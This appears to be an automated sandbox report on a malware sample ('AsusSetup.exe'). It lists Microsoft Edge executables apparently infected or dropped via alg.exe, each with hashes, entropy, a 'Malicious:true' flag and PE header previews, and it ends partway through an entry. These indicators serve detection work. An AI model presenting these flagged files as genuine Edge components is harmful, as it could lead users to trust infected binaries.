                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$.....T[$..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1812992
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.252947318942295
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:3s8DMeflpnIOvYUp/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:3VDD9pnIOjLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:08705E18117921802ED06D9B35B6A2B3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:9BD272E017984012248273B4560693165B41452A
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:0B91FDF2BD87ED8B989C4945AEE92E63AE60F2AB3071E2CA343927B69498069D
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:4751C41C756F3029F5BDB63BDE027A99BD1542019A9C6415B9911BD49B4C100878C64CAE32A0A2EC09D7C5BE63A5E4BD2D56DC69418EC2EC40212094FA55AF7E
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........J......@!.........@..............................'........... .............................................................X........F......................T.......................(...P...@...........@...`............................text............................... ..`.rdata..8...........................@..@.data...XL....... ...d..............@....pdata...F.......H..................@..@.00cfg..8.... ......................@..@.gxfg....*...0...,..................@..@.retplne.....`...........................tls.........p......................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc...`..........................@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):4364800
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.746532523664255
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:bB1sstqMHiq8kBfK9a+cOVE/TqEpEepIkRqqUu9wg6KFYso8l8EILNiXicJFFRGN:PHzorVmr2ZkRpdJYol27wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:887533ED6BCDE7BBA53662C2331CE14C
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:9EFE9077134D9AF25F629EE87C0137780961B9E2
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:D6597CF56C9480D7C76EE6D3813D933A5C6749C1668B5198135440CFFEFF90E8
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:C791DBE30580C1CB5927B180415C14103CBBD639D6825E2951440EDC1F7FC8EEF0A27D798E21351497EC47D63040AFB88089C5665473AA3A8416A7E91DD1C8F7
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......'..".......K.........@.............................PD......qC... .....................................................P.... 4.......2..Q..................to..8...................`j..(.....'.@...........0.......`........................text...'.'.......'................. ..`.rdata...A....'..B....'.............@..@.data........./......./.............@....pdata...Q....2..R....0.............@..@.00cfg..0....p3......42.............@..@.gxfg....2....3..4...62.............@..@.retplne......3......j2..................tls..........3......l2.............@...LZMADEC.......3......p2............. ..`_RDATA..\.....4.......2.............@..@malloc_h......4.......2............. ..`.rsrc........ 4.......2.............@..@.reloc... ...0;.......9.............@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1394176
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6755041436927804
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:qEyTz/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:xyXLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:0C6065A643EB8986FEF903053AC87D16
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:5FAB447962B104ED93F9762159C7F15F70E1A0F3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:0AB3F2B30DC0C28D4273DDFFD64119E4187E52E9C6599F0FA7F839843660FCC1
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:1D977981AAE25C46AB584DBED849FCBCFDAF22C9645E0CD1622E4D9B447774C2E64C0EE70210F12F78BCDE92E6AC658841A15DBA7248D916483739DAD14EA192
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."............................@.............................` .......... ..................................................]..(....................................W..T...............................@............`..X............................text............................... ..`.rdata..,...........................@..@.data...0............j..............@....pdata...............v..............@..@.00cfg..8...........................@..@.gxfg...P...........................@..@.retplne................................_RDATA..\...........................@..@.rsrc...............................@..@.reloc...`..........................@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):2354176
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.0464527285333025
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:PhDdVrQ95RW0YEHyWQXE/09Val0GSLNiXicJFFRGNzj3:PhHYW+HyWKZ7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:02A39F6A65834451980F9B1EE3EA62AA
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:AE7FC7B33DDC9B618E6D509661DD7B36ACDA3E71
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:7103233B89F635A1FCB2ABEF62D1C2E8DBAED30C8B914ABB8599EC5E54B84483
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:2DDB68E45E3EE7CE144270FA484D554054E4536146B3C6C5F48A13D53B2D9B6848DCD5934B7CC9F2A7D814BDAD0FE1E61AF08CC0BC7101700666BED4859D783E
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................`%.....?.$... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1825280
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.153830006148867
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:N70E0ZCQZMiU6Rrt9RoctGfmdd4/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:J0EzQSyRPRoc1ELNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:D536476D12E3FAFD28EE05FBBF417C47
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:3337D8556614A0CABA0110AD2FEBF1A3C9B3BDBE
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:80C082615610F1A7F759744AAB80F7177FB8D9FCC4ED5FEB708374708D2009FD
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:FA9445258261AAFCF78025700B7D423F1A25471C6E4B3D9027ED1ABCBB0E4700167E6C5352B69A6393EDEE9CB261DF11CEF97CEFD297F52B06226DE6D089409F
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........v.......k.........@.............................0......yI.... ..........................................u......ly....... ..........,....................d..T...................hc..(.......@...........@... ............................text............................... ..`.rdata.............................@..@.data........@......."..............@....pdata..,...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc........ ......................@..@.reloc.......0......................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1847808
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.140923902756681
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:JiD2VmA1YXwHwlklb8boUuWPg2g3/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ID2VmAyiwIb8boQoLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:19872E252350649D1101974D738FEE98
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:984FE167BC1017416F79E8207A1E664FAC12DF5E
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:96EBDCC342A14DB2F8ABF7BFCAF05F71F7A6B9A968BB6E84D97207FB5AD3F324
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:7A53F6B94786B3547E955D737A7BA2E8B28557F9685DC29D6575DE7689D794A27C2C98BC80D2D7672E7328F2D2FF30A9B0F4F99CC9A2984CA1943719AC5F8C24
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p............ .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):2853376
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.9482223138387775
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:vfD3zO9ZhBGloizM3HRNr00ALNiXicJFFRGNzj3:XDaalxzM00A7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:DF9DFC853B1735799AFB8618C20DCD3F
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:5C79248F4B2DA8EC4C24764E3840DA725E87FA5F
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:F5C3F90E83A8EC0D820A044DEECA634DAD8DB398EC6845E30E37FBDA7D6B3F91
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:3C1ED0192A32CFFA9A509F16FB169E42A0A8A6C2CAE68FC1A62D39C5301EF274FE0414DD607820A70DC7D5156A258B98F279D9C39DE115539867946BEEA51998
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-.......,... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):4320256
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.822725471716943
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:GTaRe7mkn5KLvD5qGVC0080pb4tgLUgGEsLABD5wTQh07yrLMLl9YPhLLNiXicJy:ZI72LvkrDpbxJRoIM47wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:E88B49EF5F20B87F5F1DB060D4583988
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:AE0F375EAD047DD505AD40BB8831549E944E65EF
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:6B7548CFA9D0D5E44944FAEAC919B4A6F79FEEF27AEB4FA43D79882F99057BAB
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:AE886EE6DB7B306E13D6ADE33F6A9B8317096F4DFC8E0E152E9783E00FEFE250C4811EA392C1FE7B0E4C86D60C63B4EECD3A409C7018F323F37F57CE484D51FC
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C......LB... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):2062336
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.09311408126846
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:EW9Jml9mmijviMnF+ZxmQWcbLw8VI/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:EWnm5iOMkjmQWkVILNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:EF7CB956EFA8466454E41E11ABE26279
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:47C80A5163F1E7684DDA2D2E28879F2A0C75EE18
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:2EE84EB67FA7CBB7919012CFA32F557B0957978D7DACF96B28DB977E83A3823C
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:738F9A367AA10F85AB5117ACBE0E506350B256BC98785D09B1D6BF634305E53684FB2ED54C164F4E061E17870ECF1FD4EAEFC0DD1B458E7FE521E73DE9B08A71
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. ......k ... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.161661135930208
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:fwNHwoYhua6MtjRO4qbBJTY6mY1uIg+/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:fwNPdQO7BJTfmERLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:B366F06CDD567A3D722B47A06CCA99B3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:763ECBC4D5D43436930827DE982C07EAAB9D22A8
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:26B29DF54BF292853FB195E6AFD8788AF754A4AAE79AFDECBF0D6C806B5BBB53
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:88AB7A9A0C5D37DE5976F279E4E7C592222045719873E91AE1AF3A4D4F672EF9C203B3E2264C96B3CAE022DC051EE9EA4BE14D925B42EA726701654336C1ADA0
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@.....................................E.... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1847808
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.140921589195591
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:NiD2VmA1YXwHwlklb8boUuWPg2g3/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:8D2VmAyiwIb8boQoLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:FC2A01884672CFE360E128D92B5B73F4
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:FB06A243B3AC5AEAD443F9B068C6AADAF0FFAD33
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:A0871AB2178EE3A5A40FA5BD25EB7D6E3DF35388922A7C4A9915048EB9640306
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:FD04311D489F7935E89D981A911BCCA38B9EF4EF3B87CC18BF5125CA39C0F46455E6EECB3C8A29F77029DC531D223610AE29F55572F680A5111AE5B0ACEF3C31
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p............ .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.1616587056386765
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:pwNHwoYhua6MtjRO4qbBJTY6mY1uIg+/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:pwNPdQO7BJTfmERLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:CE7C53BFB5C302B38F8B47E94FD9B223
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:C7740670826E05E15CDD461C8DCD5BF438FA5840
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:311C48FC31BC0E2743693C40A89662BB27E33E541A65CC2C9C3BA8B6EF5CE7C4
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:091F20E8BE24FB2159C510863026C7557A2E9EE1AF07E14471E7D3D2BEC87A4F587DE4465F7C07F5AB59724AF9192BBF3A150FFC8503E523110D7AF6E251460C
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@.....................................j.... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1481216
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.699186260708726
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:1glbht6BHF/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:OlNtqHFLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:ECD2247199F78B86DE38E872A9DEA725
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:4CE8078E3D0090B733861142C5AB378DBB459885
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:5DE62F6D6F7858E9C9EC473D0C7BF3C2F4A3D3F1763A76B17E67AB958B37AF2D
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:79458B12A888A29E0A5FED629D7B1D25EB18D078C8F8F79D67441B50B00FB1F3D54D22907DC10D9F35CFA3109029D7D33D1602F387869F4A4923991C24EF3A3B
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...*c..?....c..+c..Xc......)c.....*c..+c..|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@...........................!.....~.......................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...p...0......................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1376768
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.662279424367206
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
